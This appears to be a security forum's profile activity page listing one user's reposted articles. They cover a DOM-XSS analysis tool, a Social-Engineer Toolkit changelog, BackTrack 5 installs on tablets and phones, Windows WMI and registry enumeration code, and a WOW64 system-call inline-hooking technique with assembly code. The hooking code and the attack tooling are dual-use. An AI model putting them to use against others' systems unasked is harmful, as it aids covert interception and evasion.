Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    The DOMinator Project What is DOMinator? DOMinator is a Firefox based software for analysis and identification of DOM Based Cross Site Scripting issues (DOMXss). It is the first runtime tool which can help security testers to identify DOMXss. How it works? It uses dynamic runtime tainting model on strings and can trace back taint propagation operations in order to understand if a DOMXss vulnerability is actually exploitable. You can have an introduction about the implementation flow and some interface description here What are the possibilities? In the topics of DOMXss possibilities are quite infinite. At the moment DOMinator can help in identifying reflected DOM Based Xss, but there is potential to extend it to stored DOMXss analysis. Download Start from the installation instructions then have a look at the video. Use the issues page to post about problems crashes or whatever. And finally subscribe to the DOMinator Mailing List to get live news. Video A video has been uploaded here to show how it works. Here's the video: Soon I'll post more tutorials about the community version. Some stats about DOM Xss We downloaded top Alexa 1 million sites and analyzed the first 100 in order to verify the presence of exploitable DOM Based Cross Site Scripting vulnerabilities. Using DOMinator we found that 56 out of 100 (56% of sites) were vulnerable to reliable DOMXss attacks. Some analysis example can be found here and here. We'll release a white paper about this research, in the meantime you can try to reach our results using DOMinator. Future work DOMinator is still in beta stage but I see a lot of potential in this project. For example I can think about: Dominator library (Spidermonkey) used in web security scanners project for automated batch testing. Logging can be saved in a DB and lately analyzed. Per page testing using Selenium/iMacros. A version of DOMinator for xulrunner. A lot more It only depends on how many people will help me in improving it. So, if you're interested in contributing in the code (or in funding the project) let me know, I'll add you to the project contributors. We have some commercial ideas about developing a more usable interface with our knowledge base but we can assure you that the community version will always be open and free. In the next few days I'll release a whitepaper about DOMinator describing the implementation choices and the technical details. Stay tuned for more information about DOMinator..the best is yet to come. Acknowledgements DOMinator is a project sponsored by Minded Security, created and maintainted by me (Stefano Di Paola). I al want to thank Arshan Dabirsiaghi (Aspect Security), Gareth Heyes and Luca Carettoni (Matasano) for their feedback on the pre-pre-beta version Finally, feel free to follow DOMinator news on Twitter as well by subscribing to @WisecWisec and @DOMXss. Sursa: Minded Security Blog: The DOMinator Project
  2. Nytro
    The Social-Engineer Toolkit v1.4 “The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.” This is the official change log: Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit. Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request. Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path Fixed a bug in the new backtrack5 to recognize airmon-ng Added the ability to import your own code signed certificate without having to generate it through SET Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead Added better import detection and error handling around the python module readline. Older versions of python may not have, if it detects that python-readline is not installed it will disable tab completion Added a new menu to the main SET interface that is the new verified codesigning certificate menu Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric instance is given for input Added more documentation around the core modules in the SET User_Manual Updated the SET_User manual to reflect version 1.4 Download: http://www.secmaniac.com/download/ Sursa: UPDATE: The Social-Engineer Toolkit v1.4!
  3. Nytro
    A mai observat cineva ca aceste "disclosure"-uri sunt facute in zile ce se termina in 7? Adica 7, 17, 27... ? Ma refer la ultimele actiuni.
  4. Nytro
    NU MAI AM nytro_rst @ yahoo.com . Am dat mass cu parola, si am postat-o si aici pe forum. Nu aveam ce face cu acel ID. Si desigur, la 2 minute parola a fost schimbata si un ratat dadea mass-uri cu nu stiu ce keylogger sau stealer. Iar mail-ul de la profil, nytro@rstcenter.com e pus de forma, nu am acel mail. Deci in niciun caz nu am trimis eu acele mail-uri, nu ma ocup cu asa ceva, urasc astfel de rahaturi. Daca trimite un fisier atasat, postati aici sa il analizez.
  5. Nytro
    Back|Track 5 on Motorola XOOM in 10 minutes or less Here’s a quick down and dirty on how to get Back|Track 5 working on the Motorola XOOM. There are a few tutorials out there already but none which seemed the easiest (at least for me). 1. You will need to root your Motorola XOOM, download the android-sdk and use adb to root your XOOM. The steps can be found here. 2. Download Back|Track 5 ARM edition from here: Downloads 3. Unzip and copy the the BT5 zip file and copy it over to your XOOM’s SDCARD directory, make it easy and name the folder BT5. If your using a mac, download the Android file-transfer here. 4. Download ASTRO File manager from the Android Market on your XOOM 5. Browse to your BT5 directory on the SDCARD and click on the boot.img.gz. Extract the content in the same directory. Note we couldn’t just ungzip and copy over since its FAT32 and when its extracted it’s a total of 5gb. Note it will take a few minutes to extract, the end filesize will be exactly 5.0gb. Just be patient, and go up a directory and go back in to see when its completed, the extracting message may go away but it will still extract. 6. Once you have that, go into your terminal emulator, for example busybox terminal, and type in cd /sdcard/BT5, then cp busybox ../, then sh installbusybox.sh. Once that is completed type sh bootbt 7. You should now be at a BT command prompt. Type the following in the terminal: export USER=root 8. You can do vncpasswd to change the VNC password or leave it default (toortoor). 9. Type startvnc 10. Download a VNC viewer from the Android Market on your XOOM 11. Connect to localhost via port 5901 on the new password you just created. There you go. You’re all set. Sursa: Back|Track 5 on Motorola XOOM in 10 minutes or less | SecManiac.com
  6. Nytro
    Finding If a Computer Is a Laptop Marius Bancila C++, COM 2011-01-05 I’ve ran recently across this question: how to find (using C++) if a computer is a laptop? That is possible with WMI and many answers (such as this) point to the Win32_SystemEnclosure class. This class has a member called ChassisTypes, which is an array of integers indicating possible chassis types. At least one of them should indicate a laptop. However, there might be several problems with this solution. First, there are several values for “laptops”: * 8 – Portable * 9 – Laptop * 10 – Notebook Different machines might return different values. And more important, this property might not be defined on all computers. A more reliable solution is explained in this TechNet article Finding Computers That Are Laptops. The solution described there suggests checking for several properties: * Win32_SystemEnclosure, ChassisTypes(1)=10. * Win32_Battery or Win32_PortableBattery. * Win32_PCMCIAController * Win32_DriverVXD.Name = “pccard” * Win32_ComputerSystem.Manufacturer * Win32_ComputerSystem.Model The following code shows how one can query for the chassis types using C++. Run queries for the other properties to make sure you are running on a laptop. #define _WIN32_DCOM #include < iostream > using namespace std; #include < comdef.h > #include < Wbemidl.h > #pragma comment(lib, "wbemuuid.lib") class WMIQuery { IWbemLocator* m_pLocator; IWbemServices* m_pServices; public: WMIQuery(): m_pLocator(NULL), m_pServices(NULL) { } bool Initialize() { // Obtain the initial locator to WMI HRESULT hr = ::CoCreateInstance( CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID *) &m_pLocator); if (FAILED(hr)) { cerr << "Failed to create IWbemLocator object. Err code = 0x" << hex << hr << endl; return false; } // Connect to WMI through the IWbemLocator::ConnectServer method // Connect to the root\cimv2 namespace with the current user hr = m_pLocator->ConnectServer( _bstr_t(L"ROOT\\CIMV2"), // Object path of WMI namespace NULL, // User name. NULL = current user NULL, // User password. NULL = current 0, // Locale. NULL indicates current NULL, // Security flags. 0, // Authority (e.g. Kerberos) 0, // Context object &m_pServices // pointer to IWbemServices proxy ); if (FAILED(hr)) { cerr << "Could not connect. Error code = 0x" << hex << hr << endl; m_pLocator->Release(); m_pLocator = NULL; return false; } // Set security levels on the proxy hr = ::CoSetProxyBlanket( m_pServices, // Indicates the proxy to set RPC_C_AUTHN_WINNT, // RPC_C_AUTHN_xxx RPC_C_AUTHZ_NONE, // RPC_C_AUTHZ_xxx NULL, // Server principal name RPC_C_AUTHN_LEVEL_CALL, // RPC_C_AUTHN_LEVEL_xxx RPC_C_IMP_LEVEL_IMPERSONATE, // RPC_C_IMP_LEVEL_xxx NULL, // client identity EOAC_NONE // proxy capabilities ); if (FAILED(hr)) { cerr << "Could not set proxy blanket. Error code = 0x" << hex << hr << endl; m_pServices->Release(); m_pServices = NULL; m_pLocator->Release(); m_pLocator = NULL; return false; } return true; } IEnumWbemClassObject* Query(LPCTSTR strquery) { IEnumWbemClassObject* pEnumerator = NULL; HRESULT hr = m_pServices->ExecQuery( bstr_t("WQL"), bstr_t(strquery), WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator); if (FAILED(hr)) { cerr << "Query for operating system name failed. Error code = 0x" << hex << hr << endl; return NULL; } return pEnumerator; } ~WMIQuery() { if(m_pServices != NULL) { m_pServices->Release(); m_pServices = NULL; } if(m_pLocator != NULL) { m_pLocator->Release(); m_pLocator = NULL; } } }; int _tmain(int argc, _TCHAR* argv[]) { HRESULT hres; // Initialize COM. hres = ::CoInitializeEx(0, COINIT_MULTITHREADED); if (FAILED(hres)) { cout << "Failed to initialize COM library. Error code = 0x" << hex << hres << endl; return 1; } // Set general COM security levels hres = ::CoInitializeSecurity( NULL, -1, // COM authentication NULL, // Authentication services NULL, // Reserved RPC_C_AUTHN_LEVEL_DEFAULT, // Default authentication RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation NULL, // Authentication info EOAC_NONE, // Additional capabilities NULL // Reserved ); if (FAILED(hres)) { cout << "Failed to initialize security. Error code = 0x" << hex << hres << endl; ::CoUninitialize(); return 1; } else { WMIQuery query; if(query.Initialize()) { IEnumWbemClassObject* pEnumerator = query.Query(_T("SELECT * FROM Win32_SystemEnclosure")); if(pEnumerator != NULL) { // Get the data from the query IWbemClassObject *pclsObj; ULONG uReturn = 0; while (pEnumerator) { HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn); if(0 == uReturn) { break; } VARIANT vtProp; hr = pclsObj->Get(L"Name", 0, &vtProp, 0, 0); wcout << "Name: " << vtProp.bstrVal << endl; hr = pclsObj->Get(L"ChassisTypes", 0, &vtProp, 0, 0); wcout << "Chassis: "; SAFEARRAY* parrValues = NULL; if (vtProp.vt & VT_ARRAY) { if (VT_BYREF & vtProp.vt) parrValues = *vtProp.pparray; else parrValues = vtProp.parray; } if (parrValues != NULL) { SAFEARRAYBOUND arrayBounds[1]; arrayBounds[0].lLbound = 0; arrayBounds[0].cElements = 0; SafeArrayGetLBound(parrValues, 1, &arrayBounds[0].lLbound); SafeArrayGetUBound(parrValues, 1, (long*)&arrayBounds[0].cElements); arrayBounds[0].cElements -= arrayBounds[0].lLbound; arrayBounds[0].cElements += 1; if (arrayBounds[0].cElements > 0) { for (ULONG i = 0; i < arrayBounds[0].cElements; i++) { LONG lIndex = (LONG)i; INT item; HRESULT hr = ::SafeArrayGetElement(parrValues, &lIndex, &item); if(SUCCEEDED(hr)) { LPCTSTR szType = NULL; switch(item) { case 1: szType = _T("Other"); break; case 2: szType = _T("Unknown"); break; case 3: szType = _T("Desktop"); break; case 4: szType = _T("Low Profile Desktop"); break; case 5: szType = _T("Pizza Box"); break; case 6: szType = _T("Mini Tower"); break; case 7: szType = _T("Tower"); break; case 8: szType = _T("Portable"); break; case 9: szType = _T("Laptop"); break; case 10:szType = _T("Notebook"); break; case 11:szType = _T("Hand Held"); break; case 12:szType = _T("Docking Station"); break; case 13:szType = _T("All in One"); break; case 14:szType = _T("Sub Notebook"); break; case 15:szType = _T("Space-Saving"); break; case 16:szType = _T("Lunch Box"); break; case 17:szType = _T("Main System Chassis"); break; case 18:szType = _T("Expansion Chassis"); break; case 19:szType = _T("SubChassis"); break; case 20:szType = _T("Bus Expansion Chassis"); break; case 21:szType = _T("Peripheral Chassis"); break; case 22:szType = _T("Storage Chassis"); break; case 23:szType = _T("Rack Mount Chassis"); break; case 24:szType = _T("Sealed-Case PC"); break; } wcout << szType; if(i+1 < arrayBounds[0].cElements) wcout << ", "; } } wcout << endl; } } VariantClear(&vtProp); pclsObj->Release(); } pEnumerator->Release(); } } } ::CoUninitialize(); return 0; } On my laptop, the program output was: Name: System Enclosure Chassis: Notebook Sursa: Finding If a Computer Is a Laptop | Marius Bancila's Blog
  7. Nytro
    Finding Installed Applications with VC++ Marius Bancila C++, COM, Windows Programming 2011-05-01 Finding applications installed on a machine (the ones that you see in Control Panel Add/Remove programs) could be a little bit tricky, because there isn’t a bulletproof API or method. Each of the available methods has its own weak points. WMI is slow and can actually be disabled on a machine. MSI API only shows applications installed with an MSI, and reading directly from the Windows Registry is not an officially supported alternative. Thus it is an open point which one is the most appropriate, though the official answer will probably be MSI API. In this post I will go through all of these three methods and show how to query for the installed applications and display the name, publisher, vendor and installation location (if available). Notice these are just some samples, and if you want to use this in your applications you’ll probably want to do additional things like better error checking. Because I want the code to work both with ANSI and UNICODE I will use the following defines #include < iostream > #include < string> #ifdef _UNICODE #define tcout wcout #define tstring wstring #else #define tcout cout #define tstring string #endif WMI Win32_Product is a WMI class that represents a product installed by Windows Installer. For fetching the list of installed applications with WMI I will reuse the WMIQuery class I first shown in this post. You need to include Wbemidl.h and link with wbemuuid.lib. In the code shown below WmiQueryValue() is a function that reads a property from the current record and returns it as an STL string (UNICODE or ANSI). WmiEnum() is a function that fetches and displays in the console all the installed applications. class WMIQuery { IWbemLocator* m_pLocator; IWbemServices* m_pServices; public: WMIQuery(): m_pLocator(NULL), m_pServices(NULL) { } bool Initialize() { // Obtain the initial locator to WMI HRESULT hr = ::CoCreateInstance( CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID *) &m_pLocator); if (FAILED(hr)) { cerr << "Failed to create IWbemLocator object. Err code = 0x" << hex << hr << endl; return false; } // Connect to WMI through the IWbemLocator::ConnectServer method // Connect to the root\cimv2 namespace with the current user hr = m_pLocator->ConnectServer( _bstr_t(L"ROOT\\CIMV2"), // Object path of WMI namespace NULL, // User name. NULL = current user NULL, // User password. NULL = current 0, // Locale. NULL indicates current NULL, // Security flags. 0, // Authority (e.g. Kerberos) 0, // Context object &m_pServices // pointer to IWbemServices proxy ); if (FAILED(hr)) { cerr << "Could not connect. Error code = 0x" << hex << hr << endl; m_pLocator->Release(); m_pLocator = NULL; return false; } // Set security levels on the proxy hr = ::CoSetProxyBlanket( m_pServices, // Indicates the proxy to set RPC_C_AUTHN_WINNT, // RPC_C_AUTHN_xxx RPC_C_AUTHZ_NONE, // RPC_C_AUTHZ_xxx NULL, // Server principal name RPC_C_AUTHN_LEVEL_CALL, // RPC_C_AUTHN_LEVEL_xxx RPC_C_IMP_LEVEL_IMPERSONATE, // RPC_C_IMP_LEVEL_xxx NULL, // client identity EOAC_NONE // proxy capabilities ); if (FAILED(hr)) { cerr << "Could not set proxy blanket. Error code = 0x" << hex << hr << endl; m_pServices->Release(); m_pServices = NULL; m_pLocator->Release(); m_pLocator = NULL; return false; } return true; } IEnumWbemClassObject* Query(LPCTSTR strquery) { IEnumWbemClassObject* pEnumerator = NULL; HRESULT hr = m_pServices->ExecQuery( bstr_t("WQL"), bstr_t(strquery), WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator); if (FAILED(hr)) { cerr << "Query for operating system name failed. Error code = 0x" << hex << hr < endl; return NULL; } return pEnumerator; } ~WMIQuery() { if(m_pServices != NULL) { m_pServices->Release(); m_pServices = NULL; } if(m_pLocator != NULL) { m_pLocator->Release(); m_pLocator = NULL; } } }; tstring WmiQueryValue(IWbemClassObject* pclsObj, LPCWSTR szName) { tstring value; if(pclsObj != NULL && szName != NULL) { VARIANT vtProp; HRESULT hr = pclsObj->Get(szName, 0, &vtProp, 0, 0); if(SUCCEEDED(hr)) { if(vtProp.vt == VT_BSTR && ::SysStringLen(vtProp.bstrVal) > 0) { #ifdef _UNICODE value = vtProp.bstrVal; #else int len = ::SysStringLen(vtProp.bstrVal)+1; if(len > 0) { value.resize(len); ::WideCharToMultiByte(CP_ACP, 0, vtProp.bstrVal, -1, &value[0], len, NULL, NULL); } #endif } } } return value; } void WmiEnum() { HRESULT hres; // Initialize COM. hres = ::CoInitializeEx(0, COINIT_MULTITHREADED); if (FAILED(hres)) { cout << "Failed to initialize COM library. Error code = 0x" << hex << hres << endl; return; } // Set general COM security levels hres = ::CoInitializeSecurity( NULL, -1, // COM authentication NULL, // Authentication services NULL, // Reserved RPC_C_AUTHN_LEVEL_DEFAULT, // Default authentication RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation NULL, // Authentication info EOAC_NONE, // Additional capabilities NULL // Reserved ); if (FAILED(hres)) { cout << "Failed to initialize security. Error code = 0x" << hex << hres << endl; ::CoUninitialize(); return; } else { WMIQuery query; if(query.Initialize()) { IEnumWbemClassObject* pEnumerator = query.Query(_T("SELECT * FROM Win32_Product")); if(pEnumerator != NULL) { // Get the data from the query IWbemClassObject *pclsObj; ULONG uReturn = 0; while (pEnumerator) { HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn); if(0 == uReturn) { break; } // find the values of the properties we are interested in tstring name = WmiQueryValue(pclsObj, L"Name"); tstring publisher = WmiQueryValue(pclsObj, L"Vendor"); tstring version = WmiQueryValue(pclsObj, L"Version"); tstring location = WmiQueryValue(pclsObj, L"InstallLocation"); if(!name.empty()) { tcout << name << endl; tcout << " - " << publisher << endl; tcout << " - " << version << endl; tcout << " - " << location << endl; tcout << endl; } pclsObj->Release(); } pEnumerator->Release(); } } } // unintializa COM ::CoUninitialize(); } A sample from the output of this WmiEnum() function looks like this: Java? 6 Update 25 – Oracle – 6.0.250 – C:\Program Files\Java\jre6\ Java? SE Development Kit 6 Update 25 – Oracle – 1.6.0.250 – C:\Program Files\Java\jdk1.6.0_25\ Microsoft .NET Framework 4 Client Profile – Microsoft Corporation – 4.0.30319 - Microsoft Sync Framework Services v1.0 SP1 (x86) – Microsoft Corporation – 1.0.3010.0 - Microsoft ASP.NET MVC 2 – Visual Studio 2010 Tools – Microsoft Corporation – 2.0.50217.0 - Adobe Reader X (10.0.1) – Adobe Systems Incorporated – 10.0.1 – C:\Program Files\Adobe\Reader 10.0\Reader\ One can notice that the code is relatively long, but most important it is very slow. MSI API Two of the MSI API functions can help fetching the list of installed applications: * MsiUnumProductsEx: enumerates through one or all the instances of products that are currently advertised or installed (requires Windows Installer 3.0 or newer) * MsiGetProductInfoEx: returns product information for advertised and installed products In order to use these functions you need to include msi.h and link to msi.lib. In the code below, MsiQueryProperty() is a function that returns the value of product property (as a tstring as defined above) by calling MsiGetProductInfoEx. MsiEnum() is a function that iterates through all the installed applications and prints in the console the name, publisher, version and installation location. tstring MsiQueryProperty(LPCTSTR szProductCode, LPCTSTR szUserSid, MSIINSTALLCONTEXT dwContext, LPCTSTR szProperty) { tstring value; DWORD cchValue = 0; UINT ret2 = ::MsiGetProductInfoEx( szProductCode, szUserSid, dwContext, szProperty, NULL, &cchValue); if(ret2 == ERROR_SUCCESS) { cchValue++; value.resize(cchValue); ret2 = ::MsiGetProductInfoEx( szProductCode, szUserSid, dwContext, szProperty, (LPTSTR)&value[0], &cchValue); } return value; } void MsiEnum() { UINT ret = 0; DWORD dwIndex = 0; TCHAR szInstalledProductCode[39] = {0}; TCHAR szSid[128] = {0}; DWORD cchSid; MSIINSTALLCONTEXT dwInstalledContext; do { memset(szInstalledProductCode, 0, sizeof(szInstalledProductCode)); cchSid = sizeof(szSid)/sizeof(szSid[0]); ret = ::MsiEnumProductsEx( NULL, // all the products in the context _T("s-1-1-0"), // i.e.Everyone, all users in the system MSIINSTALLCONTEXT_USERMANAGED | MSIINSTALLCONTEXT_USERUNMANAGED | MSIINSTALLCONTEXT_MACHINE, dwIndex, szInstalledProductCode, &dwInstalledContext, szSid, &cchSid); if(ret == ERROR_SUCCESS) { tstring name = MsiQueryProperty( szInstalledProductCode, cchSid == 0 ? NULL : szSid, dwInstalledContext, INSTALLPROPERTY_INSTALLEDPRODUCTNAME); tstring publisher = MsiQueryProperty( szInstalledProductCode, cchSid == 0 ? NULL : szSid, dwInstalledContext, INSTALLPROPERTY_PUBLISHER); tstring version = MsiQueryProperty( szInstalledProductCode, cchSid == 0 ? NULL : szSid, dwInstalledContext, INSTALLPROPERTY_VERSIONSTRING); tstring location = MsiQueryProperty( szInstalledProductCode, cchSid == 0 ? NULL : szSid, dwInstalledContext, INSTALLPROPERTY_INSTALLLOCATION); tcout << name << endl; tcout << " - " << publisher << endl; tcout << " - " << version << endl; tcout << " - " << location << endl; tcout << endl; dwIndex++; } } while(ret == ERROR_SUCCESS); } And this is a sample for the WmiEnum() function. Java? 6 Update 25 - Oracle - 6.0.250 - C:\Program Files\Java\jre6\ Java? SE Development Kit 6 Update 25 - Oracle - 1.6.0.250 - C:\Program Files\Java\jdk1.6.0_25\ Microsoft .NET Framework 4 Client Profile - Microsoft Corporation - 4.0.30319 - Microsoft Sync Framework Services v1.0 SP1 (x86) - Microsoft Corporation - 1.0.3010.0 - Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - Microsoft Corporation - 2.0.50217.0 - Adobe Reader X (10.0.1) - Adobe Systems Incorporated - 10.0.1 - C:\Program Files\Adobe\Reader 10.0\Reader\ Windows Registry Installed applications are listed in Windows Registry under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall. The KB247501 article explains the structure of the information under this Registry key. Make sure you read it if you decide to use this approach. In the code shown below, RegistryQueryValue() is a function that queries the value of a name/value pair in the registry and returns the value as a tstring. RegistryEnum() is a function that prints to the console all the installed application as found in the registry. tstring RegistryQueryValue(HKEY hKey, LPCTSTR szName) { tstring value; DWORD dwType; DWORD dwSize = 0; if (::RegQueryValueEx( hKey, // key handle szName, // item name NULL, // reserved &dwType, // type of data stored NULL, // no data buffer &dwSize // required buffer size ) == ERROR_SUCCESS && dwSize > 0) { value.resize(dwSize); ::RegQueryValueEx( hKey, // key handle szName, // item name NULL, // reserved &dwType, // type of data stored (LPBYTE)&value[0], // data buffer &dwSize // available buffer size ); } return value; } void RegistryEnum() { HKEY hKey; LONG ret = ::RegOpenKeyEx( HKEY_LOCAL_MACHINE, // local machine hive _T("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"), // uninstall key 0, // reserved KEY_READ, // desired access &hKey // handle to the open key ); if(ret != ERROR_SUCCESS) return; DWORD dwIndex = 0; DWORD cbName = 1024; TCHAR szSubKeyName[1024]; while ((ret = ::RegEnumKeyEx( hKey, dwIndex, szSubKeyName, &cbName, NULL, NULL, NULL, NULL)) != ERROR_NO_MORE_ITEMS) { if (ret == ERROR_SUCCESS) { HKEY hItem; if (::RegOpenKeyEx(hKey, szSubKeyName, 0, KEY_READ, &hItem) != ERROR_SUCCESS) continue; tstring name = RegistryQueryValue(hItem, _T("DisplayName")); tstring publisher = RegistryQueryValue(hItem, _T("Publisher")); tstring version = RegistryQueryValue(hItem, _T("DisplayVersion")); tstring location = RegistryQueryValue(hItem, _T("InstallLocation")); if(!name.empty()) { tcout << name << endl; tcout << " - " << publisher << endl; tcout << " - " << version << endl; tcout << " - " << location << endl; tcout << endl; } ::RegCloseKey(hItem); } dwIndex++; cbName = 1024; } ::RegCloseKey(hKey); } And a sample output of the RegistryEnum() function: Java? SE Development Kit 6 Update 25 - Oracle - 1.6.0.250 - C:\Program Files\Java\jdk1.6.0_25\ Microsoft Visual Studio 2005 Tools for Office Runtime - Microsoft Corporation - 8.0.60940.0 - MSDN Library for Visual Studio 2008 - ENU - Microsoft - 9.0.21022 - C:\Program Files\MSDN\MSDN9.0\ Microsoft SQL Server Compact 3.5 SP2 ENU - Microsoft Corporation - 3.5.8080.0 - C:\Program Files\Microsoft SQL Server Compact Edition\ Microsoft .NET Framework 4 Client Profile - Microsoft Corporation - 4.0.30319 Sursa: Finding Installed Applications with VC++ | Marius Bancila's Blog
  8. Nytro
    Probabil doar pe cele cu arhitectura procesoarelor ARM. Si probabil nici pe astea nu se poate pe toate.
  9. Nytro
    Hooking 32bit System Calls under WOW64 oxff: Georg Wicherski 2011-05-16 16:47:49 While hooking code in userland seems to be fairly common for various purposes (such as sandboxing malware by API hooking), hooking system calls is usually not done in userland. As you can get the same information from employing such hooks in kernelland (just after the transition), people usually choose to deploy their hooks there, since they benefit from added security and stability if implemented properly. That being said, there is one application of system call hooking that rightfully belongs into userland: Hooking of 32bit system calls on a native 64bit environment. WOW64 is the emulation / abstraction layer introduced in 64bit Windows to support 32bit applications. There are many details about it that I don't want to cover. However for various reasons (I'll leave it to your creativity to find your own; I found a good one playing together with Tillmann Werner), one might be interested in hooking the 32bit system calls that are issued by a 32bit application running in such an environment. On 32bit Windows XP, there used to be a function pointer within the KUSER_SHARED_DATA page at offset 0x300 that pointed to the symbol ntdll!KiFastSystemCall for any modern machine and was used in any system call wrapper in ntdll to issue a system call: 0:001> u poi(0x7ffe0000+0x300) ntdll!KiFastSystemCall: 7c90e510 8bd4 mov edx,esp 7c90e512 0f34 sysenter ntdll!KiFastSystemCallRet: 7c90e514 c3 ret 7c90e515 8da42400000000 lea esp,[esp] 7c90e51c 8d642400 lea esp,[esp] ntdll!KiIntSystemCall: 7c90e520 8d542408 lea edx,[esp+8] 7c90e524 cd2e int 2Eh 7c90e526 c3 ret Hooking this would not make much sense, since one could gather the same data just right after the sysenter within kernelland. Now fast forward to Windows 7, 64bit with a 32bit process running on WOW64. For the following, I will use the 64bit WinDbg version. On this newer environment, the code executed by a system call wrapper, such as ntdll!ZwCreateFile in this example, does not take any indirection through KUSER_SHARED_DATA. Instead, it calls a function pointer within the TEB: 0:000:x86> u ntdll32!ZwCreateFile ntdll32!ZwCreateFile: 77a80054 b852000000 mov eax,52h 77a80059 33c9 xor ecx,ecx 77a8005b 8d542404 lea edx,[esp+4] 77a8005f 64ff15c0000000 call dword ptr fs:[0C0h] 77a80066 83c404 add esp,4 77a80069 c22c00 ret 2Ch This new field is called WOW32Reserved and points into wow64cpu: +0x0c0 WOW32Reserved : 0x743b2320 0:000:x86> u 743b2320 L1 wow64cpu!X86SwitchTo64BitMode: 743b2320 ea1e273b743300 jmp 0033:743B271E This is in turn a far jmp into the 64bit code segment. The absolute address points into the 64bit part of wow64cpu and sets up the 64bit stack first: 0:000> u 743B271E wow64cpu!CpupReturnFromSimulatedCode: 00000000`743b271e 67448b0424 mov r8d,dword ptr [esp] 00000000`743b2723 458985bc000000 mov dword ptr [r13+0BCh],r8d 00000000`743b272a 4189a5c8000000 mov dword ptr [r13+0C8h],esp 00000000`743b2731 498ba42480140000 mov rsp,qword ptr [r12+1480h] Following this, the code will convert the system call specific parameters and convert them to their 64bit equivalents. The code than transitions to the original kernel code. So the only way to grab the unmodified 32bit system calls (and parameters), before any conversion is being done, is to hook this code. My first idea was to hijack the writable function pointer inside the TEB, but that involves the inconvenience that I need to track threads and modify it for every new thread. Since this function pointer always points to the same location, I decided to go for an inline function hook. In this case, the hook is very simple, since I know that there will be one long enough instruction with fixed length operands. However, we have to take into account SMP systems that might be decoding this instruction while we're writing there, so it is desirable to use a locked write. Unfortunately, there is not enough room around the instruction to write the hook there and overwrite the original instruction with a near jmp (two bytes, can be written atomically with mov if the address is word-aligned or xchg in the general case). Hence we need to write our five bytes with one single locked write. There is (at least?) one instruction on x86 in 32bit mode which can do that: cmpxchg8b. Reading the processor manual, it gets obvious that we can abuse this to do an unconditional write if we just execute two subsequent cmpxchg8b in a row (assuming that no one else is writing there concurrently): asm("cmpxchg8b (%6)\n\tcmpxchg8b (%6)" : "=a" (* (DWORD *) origTrampoline), "=d" (* (DWORD *) &origTrampoline;[4]) : "a" (* (DWORD *) trampoline), "d" (* (DWORD *) &trampoline;[4]), "b" (* (DWORD *) trampoline), "c" (* (DWORD *) &trampoline;[4]), "D" (fnX86SwitchTo64BitMode)); One can read out the original jump destination in between those two instructions from edx:eax to hotpatch your hook before it is eventually inserted. This is especially useful when a debugger is attached, as single-stepping results in the syscall trampoline being silently executed (this is great for debugger detection). The hook can then just end in the same jmp far 0x33:?? that was present at X86SwitchTo64BitMode, one just needs to preserve esp and eax. Happy hooking! Sursa: Hooking 32bit System Calls under WOW64
  10. Nytro
    Whois Ping Port Scanner NSlookup & Traceroute Over 7,191,224 guests have used these services to scan over 1,593,876,587 ports, perform 7,490,661 nslookup's, 70,948 ping requests, 414,862 traceroute requests and 71,246 whois requests. Thank you for helping us become the leader in web-based network tools! Link: http://www.t1shopper.com/tools/
  11. Nytro
    Backtrack 5 install on Samsung Galaxy S just finished a Backtrack 5 install on my Samsung Galaxy S phone. I will detail out the steps to get it running most Android phones. While this method was ONLY testing on my Galaxy S (Vibrant) but should work with other devices. README.winning! I have split this guide into two sections. The first section titled "Quick Version" is a simple set of steps to get this working on your phone. All the work in the full version has already been completed by using the quick version. The "Full Version" goes into process detail if you would like to perform all the steps or it may help if you get stuck at any time during the process. This guide will continually be updated to include any feedback or changes. Quick Version: 1. Download the complete set of files you need from here: http://l-lacker.com/bt5/BT5_ARM_Joined.zip Extract BT5.zip to your phones internal SDcard in a directory called "BT5" (cAsE sEnSiTiVe) 2. Launch terminal emulator from your phone and type (everything after the $: or #: is user input): $: su #: cd sdcard #: cd BT5 #: sh bootbt 3. While Backtrack is loaded (when you see a red "root@localhost") start the VNC server by typing:root@localhost:~#: startvnc (stopvnc kills it) 4. Launch VNC (im using this)from your phone and point it at 127.0.0.1:5901 VNC pass: toortoor 5. Welcome to Backtrack on your Phone! Tutorial: http://pauldotcom.com/2011/05/backtrack-5-install-on-samsung.html
  12. Nytro
